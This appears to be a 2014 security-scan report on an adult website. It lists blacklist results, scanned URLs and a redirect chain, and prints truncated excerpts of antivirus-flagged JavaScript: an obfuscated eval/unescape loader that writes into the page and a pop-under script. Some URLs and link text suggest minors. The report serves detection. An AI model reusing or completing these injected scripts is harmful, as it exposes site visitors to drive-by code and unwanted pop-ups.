Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vofman.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vofman.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vofman.com/ | 200 OK Content-Length: 50503 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.trafficholder.com ...[4521 bytes skipped]... br/><td> </font></a></b></td> <td> </font></a></b></td> </tr> </table> </font><br> <table><tr valign=center> <td align=center> <b><font size=1 face=verdana>Webmasters : <a href=http://www.pussytrades.com>Trade traffic </a> | <a href="http://www.trafficholder.com/aff.php?melron"> Buy/Sell Traffic </a> | <a href="http://www.pussytrades.com/abuse.html"> Content Removal / Abuse Report</a> <br> <br><table width=750> <tr><td> <table border="1" bordercolor="000000" width=920><tr><td align=center> <font face=verdana size=2>Parents please protect your kids from accessing sex movies by simply using your browser's surfing preference ...[553 bytes skipped]... | ||
http://adspaces.ero-advertising.com/adspace/136125.js | 200 OK Content-Length: 2431 Content-Type: application/javascript | clean |
http://vofman.com/out/out.php?id=938712&url=http://www.ratx.com/tube/355475147/Just_Turned_18 | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 20:27:08 GMT Location: http://www.vofman.com/tp/out.php?p=0&link=BC Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.13 | clean |
http://www.vofman.com/tp/out.php?p=0&link=bc | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 20:27:08 GMT Location: http://www.ratx.com/tube/13231509/Young_Russian_Virgin Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html Set-Cookie: tp=MXwxfDE0MTE1MDQwMjl8MTQxMTUwNDAyOXwxOw%3D%3D; expires=Wed, 24-Sep-2014 20:27:09 GMT; path=/ Set-Cookie: ca=redirected X-Powered-By: PHP/5.2.13 | clean |
http://www.ratx.com/tube/13231509/young_russian_virgin | 200 OK Content-Length: 10151 Content-Type: text/html | malicious |
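Malicious code - confirmed by antiviruses (see below)
l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;eval(unescape('va\162%20qy%37%3D%27%27%3B%71%79%38%3D\123%74ri\156%67%2Ef\162o\155%43%68\141\162Cod\145%28%31%33%2C%31%30%29%3Bfo%72%28\151%3D%30%3B%69%3C%32%33%35%35%3B\151%2B%2B%29%7Bq%79%37%2B%3Dqy%38%7D%3B\146un\143ti\157%6E
Decoded script:
k=unescape('%0D%0A');function und1(s){var un='';l=s.length;oh=Math.round(l/2);for(i=0;i<=oh;i++){a=s.charAt(i);b=s.charAt(i+oh);c=a+b;un=un+c;};O=un.substr(0,l);};und1(se);eval(O);function und2(x){x=x.replace(/`/g,"'");x=x.replace(/@@/g,'\\');f = /qg/g;x=x.replace(f,k);document.write(x)}; k=unescape('%0D%0A');function und1(s){var un='';l=s.length;oh=Math.round(l/2);for(i=0;i<=oh;i++){a=s.charAt(i);b=s.charAt(i+oh);c=a+b;un=un+c;};O=un.substr(0,l);};und1(se);eval(O);function und2(x
Both excerpts are truncated. The first shows a browser check (document.all, document.layers, window.sidebar and the user-agent string) followed by eval(unescape(...)) over a string that mixes octal and percent escapes. The decoded stage rebuilds a string by interleaving the two halves of a variable se that is defined outside the excerpt, passes the result to eval, and defines und2, which substitutes placeholder characters and emits the result with document.write. The content that is finally written into the page is not shown here.
Antivirus reports: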
| ||
http://www.ratx.com/fpc.js | 200 OK Content-Length: 1982 Content-Type: application/javascript | malicious |
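Malicious code - confirmed by antiviruses (see below)
var puShown = false; function doOpen(url) { if ( puShown == true ) { return true; } win = window.open(url, 'ljPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=960,width=1200'); if ( win ) { win.blur(); puShown = true; } } } function checkTarget(e) { if ( !getCookie('re4k') ) { var e = e || window.event; var browLangCode = navigator.browserLanguage; var refer = window.location.href; var url = "http://www.tubery.net"; var win = doOpen(url); setCookie('rek', 1, 24*60*60*1000); } } initPu();
The excerpt is incomplete: its braces do not balance, and initPu, getCookie and setCookie are not defined in it. What is shown is a pop-under routine: doOpen opens the URL in a new window named 'ljPu' and immediately calls blur() on it, and checkTarget calls it for http://www.tubery.net when the cookie 're4k' is absent. As excerpted, the cookie set afterwards is named 'rek', not 're4k', so the cookie check would presumably not suppress later pop-unders.
Antivirus reports: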
| ||
http://adspaces.ero-advertising.com/adspace/135975.js | 200 OK Content-Length: 2431 Content-Type: application/javascript | clean |
http://vofman.com/movies/videos.php?link=top&to=hdteensex.org | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=24sextube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=1teenporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=tubemaxporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=moviemo.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=youngschoolgirls.biz | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=teenpornxxx.net | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=yeahteentube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=redpeppertube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vofman.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 20:27:07 GMT
Accept-Ranges: bytes
Server: Apache/2.2.8 (Unix)
Content-Type: text/html
GET / HTTP/1.1
Host: vofman.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 20:27:07 GMT
Accept-Ranges: bytes
Server: Apache/2.2.8 (Unix)
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: vofman.com
Referer: http://www.google.com/search?q=vofman.com
Result:
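The result is similar to the first query. There are no suspicious redirects found. As shown, this check only compares a direct request for the home page with the same request carrying a search-engine Referer. The 302 chain listed under "Scanned pages/files" (through /out/out.php and /tp/out.php to a www.ratx.com page flagged malicious) is followed from a link on the page and is not part of this comparison.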
GET / HTTP/1.1
Host: vofman.com
Referer: http://www.google.com/search?q=vofman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.